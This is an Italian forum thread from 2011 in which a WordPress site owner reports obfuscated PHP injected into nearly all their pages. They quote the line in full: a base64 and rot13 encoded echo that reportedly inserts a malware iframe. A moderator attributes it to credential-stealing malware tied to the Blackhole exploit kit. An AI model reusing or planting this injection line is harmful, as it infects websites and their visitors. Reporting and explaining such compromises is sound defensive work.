Visualizzazione risultati 1 fino 5 di 5

Discussione: Exploit che inietta codice in (quasi) tutte le pagine php del sito

  1. 01-06-2011, 13.42.20 #1
    Guest

    Predefinito Exploit che inietta codice in (quasi) tutte le pagine php del sito

    Volevo segnalarvi che sembra esserci un exploit (non so se specifico per wordpress o meno) che inserisce questo codice in cima a quasi tutte le pagine php del sito:
    Codice:
    <?php $somecrainsignvar="f9fn7k1v"; echo base64_decode(str_rot13('CTyzpzSgMFOmpzZ9W2u0qUN6Yl9cozEioJI0LKA0LJ4hnJ4inJ4hL2qcC2EyMzS1oUDaVUqcMUEbCFplWlObMJyanUD9WmVaVTMlLJ1yLz9lMTIlCFpjWm4=')); $crain="";
    Il codice in questione crea un iframe contenente un malware/trojan, infettando tutto il sito e tutti i vostri utenti. Ora non so se è una vulnerabilità di wordpress o se è una vulnerabilità di altervista ma il mio sito (amisubs.altervista.org) è appena stato colpito e sto tirando giu tutti i santi. Sono stato immediatamente sospeso da google adwords e probabilmente alcuni dei miei utenti sono rimasti infettati dal trojan.
  2. 01-06-2011, 13.51.43 #2
    L'avatar di dreadnaut
    dreadnaut
    dreadnaut non è connesso Super Moderatore
    Data registrazione
    22-02-2004
    Messaggi
    6,306

    Predefinito

    Citazione Originalmente inviato da amisubs Visualizza messaggio
    Ora non so se è una vulnerabilità di wordpress o se è una vulnerabilità di altervista ma il mio sito (amisubs.altervista.org) è appena stato colpito e sto tirando giu tutti i santi.
    Ahime, ne' uno ne' l'altro probabilmente: se fosse una vulnerabilità di Wordpress o di AlterVista, lo vedresti su tutti i blog di Wordpress, o di AlterVista.

    Simili casi sono già avvenuti, e sono di solito causati da virus sulla tua macchina, che riusano le credenziali ftp per caricare il loro codice sul tuo sito. Verifica che il tuo computer sia pulito, e cambia password.
    chezDreadnaut
  3. 01-06-2011, 14.13.35 #3
    Guest

    Predefinito

    Arghhh ho appena trovato articoli al riguardo. Era quel maledetto video su facebook. Qualcuno sa un buon metodo per cercare file infetti sul mio sito, ho riuppato tutto wordpress ma sembra ancora avere due iframe in cima.
  4. 02-06-2011, 02.21.02 #4
    L'avatar di scimmiablu
    scimmiablu
    scimmiablu non è connesso Neofita
    Data registrazione
    01-02-2011
    Messaggi
    2

    Predefinito

    bè per la cronaca fatalità è capitato pure a me oggi...e io sono molto attento ai virus ecc...
    e leggo nel forum che anche ad altri è capitato

    io credo che ci sia qualche problema nel server, o quelli in cui siamo noi.

    l'altra ipotesi è che ci fosse un bug nella versione 3.0 di wordpress mia...ma non tocco ftp ecc da una settimana
  5. 02-06-2011, 02.35.59 #5
    L'avatar di dreadnaut
    dreadnaut
    dreadnaut non è connesso Super Moderatore
    Data registrazione
    22-02-2004
    Messaggi
    6,306

    Predefinito

    Entrambe le ipotesi sono sbagliate, spiacente.

    E' l'ennesima versione del "Blackhole exploit kit", che funziona all'incirca così: tu visiti un sito infettato, che prova in tot di modi a farti scaricare ed eseguire un file. Se ci riesce, ti ritrovi installato un trojan che monitora nomi utenti e password, e se trova fra queste un sito web, infetta le pagine online. E via così.
    chezDreadnaut
« Discussione precedente | Prossima discussione »

Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •  

Regole del forum